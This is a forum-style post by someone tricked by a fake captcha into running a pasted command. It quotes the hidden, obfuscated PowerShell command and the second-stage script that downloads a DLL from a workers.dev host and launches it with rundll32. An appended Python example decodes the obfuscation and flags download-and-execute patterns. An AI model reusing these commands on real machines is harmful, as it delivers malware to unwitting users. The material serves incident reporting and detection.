I was looking for a psychologist in my area. I did a search and I opened a result. I got a captcha. It asked me to press ctrl and R, press ctrl and V and then press enter. It was late at night and I wasn't focusing so I did it without thinking.
Nothing happened after I pressed enter and then my antivirus which is ESET Home gave me an alert that it blocked something. I looked into it.
First I opened Wordpad and I pressed ctrl and V to see what was the command that I pasted. It was this:
powershell -w h -ep bypass -c "$P='https://';$US='still-snow-667e.prot...b5530d';$c=[char]0x69 [char]0x65 [char]0x78;& $c (irm $P$US$L)"
That command was trying to open https://still-snow-667e(dot)protexweer(dot)workers(dot)dev/gd?id=98532882-12b5530d in a hidden PowerShell window. I opened that website in Windows Sandbox and I saw this:
$downloadUrl="https://still-snow-667e(dot)protexweer(dot)workers(dot)dev/download?id=98532882-12b5530dnull";
(New-Object System.Net.WebClient).DownloadFile($downloadUrl, "$env:USERPROFILE\Downloads\text.dll");
Start-Process "rundll32.exe" "$env:USERPROFILE\Downloads\text.dll,Start source=98532882-12b5530d"
That looks like it was trying to download text.dll which is the malware file and run it. I checked my downloads folder. There is no text.dll. Also I checked the ESET Home alerts to see what it blocked. I saw this. That means that ESET Home blocked the website that the hidden PowerShell window tried to open thus no malware was downloaded.
I did a full system scan by using ESET Home, Emsisoft emergency portable scanner and Kaspersky emergency portable scanner. No malware was found.
Thus I am safe and no need to wipe everything and reinstall Windows?
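
The traits of the pasted command, checked in code. This is an added example, not part of the original post: it decodes the `[char]` casts to show the hidden `iex` and flags command lines that combine a web fetch with expression invocation. The sample command lines are constructed (the host `example.invalid` is a placeholder), and the trait names and scoring rule are assumptions of this example.

```python
import re

# Traits taken from the command quoted in the post. Trait names and the
# "suspicious" rule are assumptions of this example, not a vendor rule set.
TRAITS = {
    "hidden_window": re.compile(r"(?i)(?<![\w-])-w(?:in(?:dowstyle)?)?\s+h(?:idden)?\b"),
    "policy_bypass": re.compile(r"(?i)(?<![\w-])-(?:ep|exec(?:utionpolicy)?)\s+bypass\b"),
    "web_fetch": re.compile(r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b"),
    "invoke_expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
}
CAST = re.compile(r"(?i)\[char\]\s*(0x[0-9a-f]+|\d+)")
CAST_RUN = re.compile(r"(?i)(?:\[char\]\s*(?:0x[0-9a-f]+|\d+)[\s+]*)+")


def decode_char_casts(cmd):
    """Replace each run of [char]N casts with the text it spells out."""
    def spell(match):
        codes = CAST.findall(match.group(0))
        text = "".join(chr(int(c, 16) if c.lower().startswith("0x") else int(c)) for c in codes)
        return text + " "
    return CAST_RUN.sub(spell, cmd)


def analyze(cmd):
    """Return the decoded command line, the traits found, and a verdict."""
    decoded = decode_char_casts(cmd)
    traits = sorted(name for name, rx in TRAITS.items() if rx.search(decoded))
    if decoded != cmd:
        traits.append("char_cast_obfuscation")
    # Download-and-execute: fetched text is handed straight to Invoke-Expression.
    suspicious = {"web_fetch", "invoke_expression"} <= set(traits)
    return {"decoded": decoded, "traits": traits, "suspicious": suspicious}


# Constructed samples: one shaped like the command in the post, one benign.
PASTED = r'''powershell -w h -ep bypass -c "$P='https://';$US='example.invalid/gd';$c=[char]0x69+[char]0x65+[char]0x78;& $c (irm $P$US)"'''
BENIGN = r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"

if __name__ == "__main__":
    for sample in (PASTED, BENIGN):
        result = analyze(sample)
        print(result["suspicious"], result["traits"])
        print("  ", result["decoded"])
```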




